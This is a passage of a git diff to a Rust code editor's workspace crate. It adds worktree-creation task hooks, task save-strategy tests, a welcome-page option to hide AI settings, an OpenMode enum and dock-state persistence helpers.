Task::ready(None) } } + + pub fn run_create_worktree_tasks(&mut self, window: &mut Window, cx: &mut Context) { + let project = self.project().clone(); + let hooks = HashSet::from_iter([TaskHook::CreateWorktree]); + + let worktree_tasks: Vec<(WorktreeId, TaskContext, Vec)> = { + let project = project.read(cx); + let task_store = project.task_store(); + let Some(inventory) = task_store.read(cx).task_inventory().cloned() else { + return; + }; + + let git_store = project.git_store().read(cx); + + let mut worktree_tasks = Vec::new(); + for worktree in project.worktrees(cx) { + let worktree = worktree.read(cx); + let worktree_id = worktree.id(); + let worktree_abs_path = worktree.abs_path(); + + let templates: Vec = inventory + .read(cx) + .templates_with_hooks(&hooks, worktree_id) + .into_iter() + .map(|(_, template)| template) + .collect(); + + if templates.is_empty() { + continue; + } + + let mut task_variables = TaskVariables::default(); + task_variables.insert( + VariableName::WorktreeRoot, + worktree_abs_path.to_string_lossy().into_owned(), + ); + + if let Some(path) = git_store.original_repo_path_for_worktree(worktree_id, cx) { + task_variables.insert( + VariableName::MainGitWorktree, + path.to_string_lossy().into_owned(), + ); + } + + let task_context = TaskContext { + cwd: Some(worktree_abs_path.to_path_buf()), + task_variables, + project_env: Default::default(), + }; + + worktree_tasks.push((worktree_id, task_context, templates)); + } + worktree_tasks + }; + + if worktree_tasks.is_empty() { + return; + } + + let task = cx.spawn_in(window, async move |workspace, cx| { + let mut tasks = Vec::new(); + for (worktree_id, task_context, templates) in worktree_tasks { + let id_base = format!("worktree_setup_{worktree_id}"); + + tasks.push(cx.spawn({ + let workspace = workspace.clone(); + async move |cx| { + for task_template in templates { + let Some(resolved) = + task_template.resolve_task(&id_base, &task_context) + else { + continue; + }; + + let status = workspace.update_in(cx, |workspace, window, cx| { + workspace.spawn_in_terminal(resolved.resolved, window, cx) + })?; + + if let Some(result) = status.await { + match result { + Ok(exit_status) if !exit_status.success() => { + log::error!( + "Git worktree setup task failed with status: {:?}", + exit_status.code() + ); + break; + } + Err(error) => { + log::error!("Git worktree setup task error: {error:#}"); + break; + } + _ => {} + } + } + } + anyhow::Ok(()) + } + })); + } + + futures::future::join_all(tasks).await; + anyhow::Ok(()) + }); + task.detach_and_log_err(cx); + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::{ + TerminalProvider, + item::test::{TestItem, TestProjectItem}, + register_serializable_item, + }; + use gpui::{App, TestAppContext}; + use parking_lot::Mutex; + use project::{FakeFs, Project, TaskSourceKind}; + use serde_json::json; + use std::sync::Arc; + use task::TaskTemplate; + + struct Fixture { + workspace: Entity, + item: Entity, + task: ResolvedTask, + dirty_before_spawn: Arc>>, + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_all(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::All).await; + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false)); + assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty)); + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_current(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::Current).await; + // Add a second inactive dirty item + let inactive = add_test_item(&fixture.workspace, "file2.txt", false, cx); + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + // The active item (fixture.item) should be saved + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(false)); + assert!(cx.read(|cx| !fixture.item.read(cx).is_dirty)); + // The inactive item should not be saved + assert!(cx.read(|cx| inactive.read(cx).is_dirty)); + } + + #[gpui::test] + async fn test_schedule_resolved_task_save_none(cx: &mut TestAppContext) { + let (fixture, cx) = create_fixture(cx, SaveStrategy::None).await; + fixture.workspace.update_in(cx, |workspace, window, cx| { + workspace.schedule_resolved_task( + TaskSourceKind::UserInput, + fixture.task, + false, + window, + cx, + ); + }); + cx.executor().run_until_parked(); + + assert_eq!(*fixture.dirty_before_spawn.lock(), Some(true)); + assert!(cx.read(|cx| fixture.item.read(cx).is_dirty)); + } + + async fn create_fixture( + cx: &mut TestAppContext, + save_strategy: SaveStrategy, + ) -> (Fixture, &mut gpui::VisualTestContext) { + cx.update(|cx| { + let settings_store = settings::SettingsStore::test(cx); + cx.set_global(settings_store); + theme_settings::init(theme::LoadThemes::JustBase, cx); + register_serializable_item::(cx); + }); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree("/root", json!({ "file.txt": "dirty" })) + .await; + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let (workspace, cx) = + cx.add_window_view(|window, cx| Workspace::test_new(project.clone(), window, cx)); + + // Add a dirty item to the workspace + let item = add_test_item(&workspace, "file.txt", true, cx); + + let template = TaskTemplate { + label: "test".to_string(), + command: "echo".to_string(), + save: save_strategy, + ..Default::default() + }; + let task = template + .resolve_task("test", &task::TaskContext::default()) + .unwrap(); + let dirty_before_spawn: Arc>> = Arc::default(); + let terminal_provider = Box::new(TestTerminalProvider { + item: item.clone(), + dirty_before_spawn: dirty_before_spawn.clone(), + }); + workspace.update(cx, |workspace, _| { + workspace.terminal_provider = Some(terminal_provider); + }); + let fixture = Fixture { + workspace, + item, + task, + dirty_before_spawn, + }; + (fixture, cx) + } + + fn add_test_item( + workspace: &Entity, + name: &str, + active: bool, + cx: &mut gpui::VisualTestContext, + ) -> Entity { + let item = cx.new(|cx| { + TestItem::new(cx) + .with_dirty(true) + .with_project_items(&[TestProjectItem::new(1, name, cx)]) + }); + workspace.update_in(cx, |workspace, window, cx| { + let pane = workspace.active_pane().clone(); + workspace.add_item(pane, Box::new(item.clone()), None, true, active, window, cx); + }); + item + } + + struct TestTerminalProvider { + item: Entity, + dirty_before_spawn: Arc>>, + } + + impl TerminalProvider for TestTerminalProvider { + fn spawn( + &self, + _task: task::SpawnInTerminal, + _window: &mut ui::Window, + cx: &mut App, + ) -> Task>> { + *self.dirty_before_spawn.lock() = Some(cx.read_entity(&self.item, |e, _| e.is_dirty)); + Task::ready(Some(Ok(ExitStatus::default()))) + } + } } diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index 1caa5b56e5f38db00ad59a4aca3a2a830ee023b7..dceca3e85f4308952563e689c608c92e9f77144f 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -1,6 +1,7 @@ use crate::{ - NewFile, Open, PathList, SerializedWorkspaceLocation, WORKSPACE_DB, Workspace, WorkspaceId, + NewFile, Open, OpenMode, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceId, item::{Item, ItemEvent}, + persistence::WorkspaceDb, }; use chrono::{DateTime, Utc}; use git::Clone as GitClone; @@ -10,8 +11,10 @@ use gpui::{ ParentElement, Render, Styled, Task, Window, actions, }; use menu::{SelectNext, SelectPrevious}; +use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; +use settings::Settings; use ui::{ButtonLike, Divider, DividerColor, KeyBinding, Vector, VectorName, prelude::*}; use util::ResultExt; use zed_actions::{Extensions, OpenOnboarding, OpenSettings, agent, command_palette}; @@ -121,21 +124,43 @@ impl RenderOnce for SectionButton { } } +enum SectionVisibility { + Always, + Conditional(fn(&App) -> bool), +} + +impl SectionVisibility { + fn is_visible(&self, cx: &App) -> bool { + match self { + SectionVisibility::Always => true, + SectionVisibility::Conditional(f) => f(cx), + } + } +} + struct SectionEntry { icon: IconName, title: &'static str, action: &'static dyn Action, + visibility_guard: SectionVisibility, } impl SectionEntry { - fn render(&self, button_index: usize, focus: &FocusHandle, _cx: &App) -> impl IntoElement { - SectionButton::new( - self.title, - self.icon, - self.action, - button_index, - focus.clone(), - ) + fn render( + &self, + button_index: usize, + focus: &FocusHandle, + cx: &App, + ) -> Option { + self.visibility_guard.is_visible(cx).then(|| { + SectionButton::new( + self.title, + self.icon, + self.action, + button_index, + focus.clone(), + ) + }) } } @@ -147,21 +172,25 @@ const CONTENT: (Section<4>, Section<3>) = ( icon: IconName::Plus, title: "New File", action: &NewFile, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::FolderOpen, title: "Open Project", - action: &Open, + action: &Open::DEFAULT, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::CloudDownload, title: "Clone Repository", action: &GitClone, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::ListCollapse, title: "Open Command Palette", action: &command_palette::Toggle, + visibility_guard: SectionVisibility::Always, }, ], }, @@ -172,11 +201,15 @@ const CONTENT: (Section<4>, Section<3>) = ( icon: IconName::Settings, title: "Open Settings", action: &OpenSettings, + visibility_guard: SectionVisibility::Always, }, SectionEntry { icon: IconName::ZedAssistant, title: "View AI Settings", action: &agent::OpenSettings, + visibility_guard: SectionVisibility::Conditional(|cx| { + !DisableAiSettings::get_global(cx).disable_ai + }), }, SectionEntry { icon: IconName::Blocks, @@ -185,6 +218,7 @@ const CONTENT: (Section<4>, Section<3>) = ( category_filter: None, id: None, }, + visibility_guard: SectionVisibility::Always, }, ], }, @@ -204,7 +238,7 @@ impl Section { self.entries .iter() .enumerate() - .map(|(index, entry)| entry.render(index_offset + index, focus, cx)), + .filter_map(|(index, entry)| entry.render(index_offset + index, focus, cx)), ) } } @@ -238,9 +272,10 @@ impl WelcomePage { let fs = workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); + let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this: WeakEntity, cx| { let Some(fs) = fs else { return }; - let workspaces = WORKSPACE_DB + let workspaces = db .recent_workspaces_on_disk(fs.as_ref()) .await .log_err() @@ -291,7 +326,7 @@ impl WelcomePage { self.workspace .update(cx, |workspace, cx| { workspace - .open_workspace_for_paths(true, paths, window, cx) + .open_workspace_for_paths(OpenMode::Activate, paths, window, cx) .detach_and_log_err(cx); }) .log_err(); @@ -485,7 +520,7 @@ impl crate::SerializableItem for WelcomePage { alive_items, workspace_id, "welcome_pages", - &persistence::WELCOME_PAGES, + &persistence::WelcomePagesDb::global(cx), cx, ) } @@ -498,7 +533,7 @@ impl crate::SerializableItem for WelcomePage { window: &mut Window, cx: &mut App, ) -> Task>> { - if persistence::WELCOME_PAGES + if persistence::WelcomePagesDb::global(cx) .get_welcome_page(item_id, workspace_id) .ok() .is_some_and(|is_open| is_open) @@ -520,11 +555,10 @@ impl crate::SerializableItem for WelcomePage { cx: &mut Context, ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - persistence::WELCOME_PAGES - .save_welcome_page(item_id, workspace_id, true) - .await - })) + let db = persistence::WelcomePagesDb::global(cx); + Some(cx.background_spawn( + async move { db.save_welcome_page(item_id, workspace_id, true).await }, + )) } fn should_serialize(&self, event: &Self::Event) -> bool { @@ -558,7 +592,7 @@ mod persistence { )]); } - db::static_connection!(WELCOME_PAGES, WelcomePagesDb, [WorkspaceDb]); + db::static_connection!(WelcomePagesDb, [WorkspaceDb]); impl WelcomePagesDb { query! { diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index cde04d987a015982006d283c17ee82ed9b7a7cb2..7979ffe828cbf8c4da5a40a29eaa6537f1433c3c 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -1,9 +1,12 @@ +pub mod active_file_name; pub mod dock; pub mod history_manager; pub mod invalid_item_view; pub mod item; mod modal_layer; mod multi_workspace; +#[cfg(test)] +mod multi_workspace_tests; pub mod notifications; pub mod pane; pub mod pane_group; @@ -14,7 +17,9 @@ mod persistence; pub mod searchable; mod security_modal; pub mod shared_screen; +use db::smol::future::yield_now; pub use shared_screen::SharedScreen; +pub mod focus_follows_mouse; mod status_bar; pub mod tasks; mod theme_preview; @@ -26,9 +31,9 @@ mod workspace_settings; pub use crate::notifications::NotificationFrame; pub use dock::Panel; pub use multi_workspace::{ - DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, NewWorkspaceInWindow, - NextWorkspaceInWindow, PreviousWorkspaceInWindow, Sidebar, SidebarEvent, SidebarHandle, - ToggleWorkspaceSidebar, + CloseWorkspaceSidebar, DraggedSidebar, FocusWorkspaceSidebar, MultiWorkspace, + MultiWorkspaceEvent, Sidebar, SidebarEvent, SidebarHandle, SidebarRenderState, SidebarSide, + ToggleWorkspaceSidebar, sidebar_side_context_menu, }; pub use path_list::{PathList, SerializedPathList}; pub use toast_layer::{ToastAction, ToastLayer, ToastView}; @@ -50,8 +55,8 @@ use futures::{ future::{Shared, try_join_all}, }; use gpui::{ - Action, AnyEntity, AnyView, AnyWeakView, App, AsyncApp, AsyncWindowContext, Bounds, Context, - CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, + Action, AnyEntity, AnyView, AnyWeakView, App, AsyncApp, AsyncWindowContext, Axis, Bounds, + Context, CursorStyle, Decorations, DragMoveEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, Global, HitboxBehavior, Hsla, KeyContext, Keystroke, ManagedView, MouseButton, PathPromptOptions, Point, PromptLevel, Render, ResizeEdge, Size, Stateful, Subscription, SystemWindowTabController, Task, Tiling, WeakEntity, WindowBounds, WindowHandle, WindowId, @@ -75,16 +80,19 @@ pub use pane_group::{ ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext, SplitDirection, }; -use persistence::{DB, SerializedWindowBounds, model::SerializedWorkspace}; +use persistence::{SerializedWindowBounds, model::SerializedWorkspace}; pub use persistence::{ - DB as WORKSPACE_DB, WorkspaceDb, delete_unloaded_items, - model::{ItemId, SerializedMultiWorkspace, SerializedWorkspaceLocation, SessionWorkspace}, - read_serialized_multi_workspaces, + WorkspaceDb, delete_unloaded_items, + model::{ + DockStructure, ItemId, MultiWorkspaceState, SerializedMultiWorkspace, + SerializedWorkspaceLocation, SessionWorkspace, + }, + read_serialized_multi_workspaces, resolve_worktree_workspaces, }; use postage::stream::Stream; use project::{ - DirectoryLister, Project, ProjectEntryId, ProjectPath, ResolvedPath, Worktree, WorktreeId, - WorktreeSettings, + DirectoryLister, Project, ProjectEntryId, ProjectGroupKey, ProjectPath, ResolvedPath, Worktree, + WorktreeId, WorktreeSettings, debugger::{breakpoint_store::BreakpointStoreEvent, session::ThreadStatus}, project_settings::ProjectSettings, toolchain_store::ToolchainStoreEvent, @@ -119,13 +127,14 @@ use std::{ process::ExitStatus, rc::Rc, sync::{ - Arc, LazyLock, Weak, + Arc, LazyLock, atomic::{AtomicBool, AtomicUsize}, }, time::Duration, }; use task::{DebugScenario, SharedTaskContext, SpawnInTerminal}; -use theme::{ActiveTheme, GlobalTheme, SystemAppearance, ThemeSettings}; +use theme::{ActiveTheme, SystemAppearance}; +use theme_settings::ThemeSettings; pub use toolbar::{ PaneSearchBarCallbacks, Toolbar, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, }; @@ -139,16 +148,16 @@ use util::{ }; use uuid::Uuid; pub use workspace_settings::{ - AutosaveSetting, BottomDockLayout, RestoreOnStartupBehavior, StatusBarSettings, TabBarSettings, - WorkspaceSettings, + AutosaveSetting, BottomDockLayout, FocusFollowsMouse, RestoreOnStartupBehavior, + StatusBarSettings, TabBarSettings, WorkspaceSettings, }; -use zed_actions::{Spawn, feedback::FileBugReport}; +use zed_actions::{Spawn, feedback::FileBugReport, theme::ToggleMode}; -use crate::{item::ItemBufferKind, notifications::NotificationId}; +use crate::{dock::PanelSizeState, item::ItemBufferKind, notifications::NotificationId}; use crate::{ persistence::{ SerializedAxis, - model::{DockData, DockStructure, SerializedItem, SerializedPane, SerializedPaneGroup}, + model::{DockData, SerializedItem, SerializedPane, SerializedPaneGroup}, }, security_modal::SecurityModal, }; @@ -205,6 +214,34 @@ pub trait DebuggerProvider { fn active_thread_state(&self, cx: &App) -> Option; } +/// Opens a file or directory. +#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] +#[action(namespace = workspace)] +pub struct Open { + /// When true, opens in a new window. When false, adds to the current + /// window as a new workspace (multi-workspace). + #[serde(default = "Open::default_create_new_window")] + pub create_new_window: bool, +} + +impl Open { + pub const DEFAULT: Self = Self { + create_new_window: true, + }; + + /// Used by `#[serde(default)]` on the `create_new_window` field so that + /// the serde default and `Open::DEFAULT` stay in sync. + fn default_create_new_window() -> bool { + Self::DEFAULT.create_new_window + } +} + +impl Default for Open { + fn default() -> Self { + Self::DEFAULT + } +} + actions!( workspace, [ @@ -250,8 +287,6 @@ actions!( NewSearch, /// Opens a new window. NewWindow, - /// Opens a file or directory. - Open, /// Opens multiple files. OpenFiles, /// Opens the current location in terminal. @@ -370,7 +405,12 @@ pub struct Save { pub save_intent: Option, } -/// Closes all items and panes in the workspace. +/// Moves Focus to the central panes in the workspace. +#[derive(Clone, Debug, PartialEq, Eq, Action)] +#[action(namespace = workspace)] +pub struct FocusCenterPane; + +/// Closes all items and panes in the workspace. #[derive(Clone, PartialEq, Debug, Deserialize, Default, JsonSchema, Action)] #[action(namespace = workspace)] #[serde(deny_unknown_fields)] @@ -616,25 +656,52 @@ impl From for i64 { } } -fn prompt_and_open_paths(app_state: Arc, options: PathPromptOptions, cx: &mut App) { +fn prompt_and_open_paths( + app_state: Arc, + options: PathPromptOptions, + create_new_window: bool, + cx: &mut App, +) { if let Some(workspace_window) = local_workspace_windows(cx).into_iter().next() { workspace_window .update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| { - prompt_for_open_path_and_open(workspace, app_state, options, window, cx); + prompt_for_open_path_and_open( + workspace, + app_state, + options, + create_new_window, + window, + cx, + ); }); }) .ok(); } else { - let task = Workspace::new_local(Vec::new(), app_state.clone(), None, None, None, cx); + let task = Workspace::new_local( + Vec::new(), + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ); cx.spawn(async move |cx| { - let (window, _) = task.await?; + let OpenResult { window, .. } = task.await?; window.update(cx, |multi_workspace, window, cx| { window.activate_window(); let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| { - prompt_for_open_path_and_open(workspace, app_state, options, window, cx); + prompt_for_open_path_and_open( + workspace, + app_state, + options, + create_new_window, + window, + cx, + ); }); })?; anyhow::Ok(()) @@ -647,6 +714,7 @@ pub fn prompt_for_open_path_and_open( workspace: &mut Workspace, app_state: Arc, options: PathPromptOptions, + create_new_window: bool, window: &mut Window, cx: &mut Context, ) { @@ -656,13 +724,27 @@ pub fn prompt_for_open_path_and_open( window, cx, ); + let multi_workspace_handle = window.window_handle().downcast::(); cx.spawn_in(window, async move |this, cx| { let Some(paths) = paths.await.log_err().flatten() else { return; }; + if !create_new_window { + if let Some(handle) = multi_workspace_handle { + if let Some(task) = handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.open_project(paths, OpenMode::Activate, window, cx) + }) + .log_err() + { + task.await.log_err(); + } + return; + } + } if let Some(task) = this .update_in(cx, |this, window, cx| { - this.open_workspace_for_paths(false, paths, window, cx) + this.open_workspace_for_paths(OpenMode::NewWindow, paths, window, cx) }) .log_err() { @@ -680,40 +762,34 @@ pub fn init(app_state: Arc, cx: &mut App) { cx.on_action(|_: &CloseWindow, cx| Workspace::close_global(cx)) .on_action(|_: &Reload, cx| reload(cx)) - .on_action({ - let app_state = Arc::downgrade(&app_state); - move |_: &Open, cx: &mut App| { - if let Some(app_state) = app_state.upgrade() { - prompt_and_open_paths( - app_state, - PathPromptOptions { - files: true, - directories: true, - multiple: true, - prompt: None, - }, - cx, - ); - } - } + .on_action(|action: &Open, cx: &mut App| { + let app_state = AppState::global(cx); + prompt_and_open_paths( + app_state, + PathPromptOptions { + files: true, + directories: true, + multiple: true, + prompt: None, + }, + action.create_new_window, + cx, + ); }) - .on_action({ - let app_state = Arc::downgrade(&app_state); - move |_: &OpenFiles, cx: &mut App| { - let directories = cx.can_select_mixed_files_and_dirs(); - if let Some(app_state) = app_state.upgrade() { - prompt_and_open_paths( - app_state, - PathPromptOptions { - files: true, - directories, - multiple: true, - prompt: None, - }, - cx, - ); - } - } + .on_action(|_: &OpenFiles, cx: &mut App| { + let directories = cx.can_select_mixed_files_and_dirs(); + let app_state = AppState::global(cx); + prompt_and_open_paths( + app_state, + PathPromptOptions { + files: true, + directories, + multiple: true, + prompt: None, + }, + true, + cx, + ); }); } @@ -1022,7 +1098,7 @@ pub struct AppState { pub session: Entity, } -struct GlobalAppState(Weak); +struct GlobalAppState(Arc); impl Global for GlobalAppState {} @@ -1058,14 +1134,14 @@ struct Follower { impl AppState { #[track_caller] - pub fn global(cx: &App) -> Weak { + pub fn global(cx: &App) -> Arc { cx.global::().0.clone() } - pub fn try_global(cx: &App) -> Option> { + pub fn try_global(cx: &App) -> Option> { cx.try_global::() .map(|state| state.0.clone()) } - pub fn set_global(state: Weak, cx: &mut App) { + pub fn set_global(state: Arc, cx: &mut App) { cx.set_global(GlobalAppState(state)); } @@ -1091,7 +1167,7 @@ impl AppState { let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); let workspace_store = cx.new(|cx| WorkspaceStore::new(client.clone(), cx)); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); client::init(&client, cx); Arc::new(Self { @@ -1185,6 +1261,7 @@ pub enum Event { ZoomChanged, ModalOpened, Activate, + PanelAdded(AnyView), } #[derive(Debug, Clone)] @@ -1289,6 +1366,11 @@ pub struct Workspace { scheduled_tasks: Vec>, last_open_dock_positions: Vec, removing: bool, + open_in_dev_container: bool, + _dev_container_task: Option>>, + _panels_task: Option>>, + sidebar_focus_handle: Option, + multi_workspace: Option>, } impl EventEmitter for Workspace {} @@ -1311,6 +1393,17 @@ struct FollowerView { location: Option, } +#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)] +pub enum OpenMode { + /// Open the workspace in a new window. + NewWindow, + /// Add to the window's multi workspace without activating it (used during deserialization). + Add, + /// Add to the window's multi workspace and activate it. + #[default] + Activate, +} + impl Workspace { pub fn new( workspace_id: Option, @@ -1330,10 +1423,10 @@ impl Workspace { |new_trusted_worktrees, cx| { let timeout = cx.background_executor().timer(SERIALIZATION_THROTTLE_TIME); + let db = WorkspaceDb::global(cx); cx.background_spawn(async move { timeout.await; - persistence::DB - .save_trusted_worktrees(new_trusted_worktrees) + db.save_trusted_worktrees(new_trusted_worktrees) .await .log_err(); }) @@ -1367,7 +1460,13 @@ impl Workspace { this.collaborator_left(*peer_id, window, cx); } - &project::Event::WorktreeRemoved(id) | &project::Event::WorktreeAdded(id) => { + &project::Event::WorktreeRemoved(_) => { + this.update_window_title(window, cx); + this.serialize_workspace(window, cx); + this.update_history(cx); + } + + &project::Event::WorktreeAdded(id) => { this.update_window_title(window, cx); if this .project() @@ -1567,8 +1666,13 @@ impl Workspace { let left_dock_buttons = cx.new(|cx| PanelButtons::new(left_dock.clone(), cx)); let bottom_dock_buttons = cx.new(|cx| PanelButtons::new(bottom_dock.clone(), cx)); let right_dock_buttons = cx.new(|cx| PanelButtons::new(right_dock.clone(), cx)); + let multi_workspace = window + .root::() + .flatten() + .map(|mw| mw.downgrade()); let status_bar = cx.new(|cx| { - let mut status_bar = StatusBar::new(¢er_pane.clone(), window, cx); + let mut status_bar = + StatusBar::new(¢er_pane.clone(), multi_workspace.clone(), window, cx); status_bar.add_left_item(left_dock_buttons, window, cx); status_bar.add_right_item(right_dock_buttons, window, cx); status_bar.add_right_item(bottom_dock_buttons, window, cx); @@ -1616,8 +1720,8 @@ impl Workspace { *SystemAppearance::global_mut(cx) = SystemAppearance(window_appearance.into()); - GlobalTheme::reload_theme(cx); - GlobalTheme::reload_icon_theme(cx); + theme_settings::reload_theme(cx); + theme_settings::reload_icon_theme(cx); }), cx.on_release({ let weak_handle = weak_handle.clone(); @@ -1659,6 +1763,7 @@ impl Workspace { left_dock, bottom_dock, right_dock, + _panels_task: None, project: project.clone(), follower_states: Default::default(), last_leaders_by_pane: Default::default(), @@ -1693,6 +1798,10 @@ impl Workspace { scheduled_tasks: Vec::new(), last_open_dock_positions: Vec::new(), removing: false, + sidebar_focus_handle: None, + multi_workspace, + open_in_dev_container: false, + _dev_container_task: None, } } @@ -1702,13 +1811,9 @@ impl Workspace { requesting_window: Option>, env: Option>, init: Option) + Send>>, + open_mode: OpenMode, cx: &mut App, - ) -> Task< - anyhow::Result<( - WindowHandle, - Vec>>>, - )>, - > { + ) -> Task> { let project_handle = Project::local( app_state.client.clone(), app_state.node_runtime.clone(), @@ -1720,6 +1825,8 @@ impl Workspace { cx, ); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.spawn(async move |cx| { let mut paths_to_open = Vec::with_capacity(abs_paths.len()); for path in abs_paths.into_iter() { @@ -1730,8 +1837,7 @@ impl Workspace { } } - let serialized_workspace = - persistence::DB.workspace_for_roots(paths_to_open.as_slice()); + let serialized_workspace = db.workspace_for_roots(paths_to_open.as_slice()); if let Some(paths) = serialized_workspace.as_ref().map(|ws| &ws.paths) { paths_to_open = paths.ordered_paths().cloned().collect(); @@ -1763,10 +1869,10 @@ impl Workspace { let workspace_id = if let Some(serialized_workspace) = serialized_workspace.as_ref() { serialized_workspace.id } else { - DB.next_id().await.unwrap_or_else(|_| Default::default()) + db.next_id().await.unwrap_or_else(|_| Default::default()) }; - let toolchains = DB.toolchains(workspace_id).await?; + let toolchains = db.toolchains(workspace_id).await?; for (toolchain, worktree_path, path) in toolchains { let toolchain_path = PathBuf::from(toolchain.path.clone().to_string()); @@ -1803,8 +1909,13 @@ impl Workspace { }); } + let window_to_replace = match open_mode { + OpenMode::NewWindow => None, + _ => requesting_window, + }; + let (window, workspace): (WindowHandle, Entity) = - if let Some(window) = requesting_window { + if let Some(window) = window_to_replace { let centered_layout = serialized_workspace .as_ref() .map(|w| w.centered_layout) @@ -1829,7 +1940,17 @@ impl Workspace { workspace }); - multi_workspace.activate(workspace.clone(), cx); + match open_mode { + OpenMode::Activate => { + multi_workspace.activate(workspace.clone(), window, cx); + } + OpenMode::Add => { + multi_workspace.add(workspace.clone(), &*window, cx); + } + OpenMode::NewWindow => { + unreachable!() + } + } workspace })?; (window, workspace) @@ -1845,7 +1966,7 @@ impl Workspace { // Reopening an existing workspace - restore its saved bounds (Some(bounds.0), Some(display)) } else if let Some((display, bounds)) = - persistence::read_default_window_bounds() + persistence::read_default_window_bounds(&kvp) { // New or empty workspace - use the last known window bounds (Some(bounds), Some(display)) @@ -1916,7 +2037,7 @@ impl Workspace { // 1. This is an empty workspace (no paths), AND // 2. The serialized workspace either doesn't exist or has no paths if is_empty_workspace && !serialized_workspace_has_paths { - if let Some(default_docks) = persistence::read_default_dock_state() { + if let Some(default_docks) = persistence::read_default_dock_state(&kvp) { window .update(cx, |_, window, cx| { workspace.update(cx, |workspace, cx| { @@ -1944,10 +2065,18 @@ impl Workspace { }); }) .log_err(); - Ok((window, opened_items)) + Ok(OpenResult { + window, + workspace, + opened_items, + }) }) } + pub fn project_group_key(&self, cx: &App) -> ProjectGroupKey { + self.project.read(cx).project_group_key(cx) + } + pub fn weak_handle(&self) -> WeakEntity { self.weak_self.clone() } @@ -1983,6 +2112,76 @@ impl Workspace { [&self.left_dock, &self.bottom_dock, &self.right_dock] } + pub fn capture_dock_state(&self, _window: &Window, cx: &App) -> DockStructure { + let left_dock = self.left_dock.read(cx); + let left_visible = left_dock.is_open(); + let left_active_panel = left_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + // `zoomed_position` is kept in sync with individual panel zoom state + // by the dock code in `Dock::new` and `Dock::add_panel`. + let left_dock_zoom = self.zoomed_position == Some(DockPosition::Left); + + let right_dock = self.right_dock.read(cx); + let right_visible = right_dock.is_open(); + let right_active_panel = right_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + let right_dock_zoom = self.zoomed_position == Some(DockPosition::Right); + + let bottom_dock = self.bottom_dock.read(cx); + let bottom_visible = bottom_dock.is_open(); + let bottom_active_panel = bottom_dock + .active_panel() + .map(|panel| panel.persistent_name().to_string()); + let bottom_dock_zoom = self.zoomed_position == Some(DockPosition::Bottom); + + DockStructure { + left: DockData { + visible: left_visible, + active_panel: left_active_panel, + zoom: left_dock_zoom, + }, + right: DockData { + visible: right_visible, + active_panel: right_active_panel, + zoom: right_dock_zoom, + }, + bottom: DockData { + visible: bottom_visible, + active_panel: bottom_active_panel, + zoom: bottom_dock_zoom, + }, + } + } + + pub fn set_dock_structure( + &self, + docks: DockStructure, + window: &mut Window, + cx: &mut Context, + ) { + for (dock, data) in [ + (&self.left_dock, docks.left), + (&self.bottom_dock, docks.bottom), + (&self.right_dock, docks.right), + ] { + dock.update(cx, |dock, cx| { + dock.serialized_dock = Some(data); + dock.restore_state(window, cx); + }); + } + } + + pub fn open_item_abs_paths(&self, cx: &App) -> Vec { + self.items(cx) + .filter_map(|item| { + let project_path = item.project_path(cx)?; + self.project.read(cx).absolute_path(&project_path, cx) + }) + .collect() + } + pub fn dock_at_position(&self, position: DockPosition) -> &Entity { match position { DockPosition::Left => &self.left_dock, @@ -1991,6 +2190,197 @@ impl Workspace { } } + pub fn agent_panel_position(&self, cx: &App) -> Option { + self.all_docks().into_iter().find_map(|dock| { + let dock = dock.read(cx); + dock.has_agent_panel(cx).then_some(dock.position()) + }) + } + + pub fn panel_size_state(&self, cx: &App) -> Option { + self.all_docks().into_iter().find_map(|dock| { + let dock = dock.read(cx); + let panel = dock.panel::()?; + dock.stored_panel_size_state(&panel) + }) + } + + pub fn persisted_panel_size_state( + &self, + panel_key: &'static str, + cx: &App, + ) -> Option { + 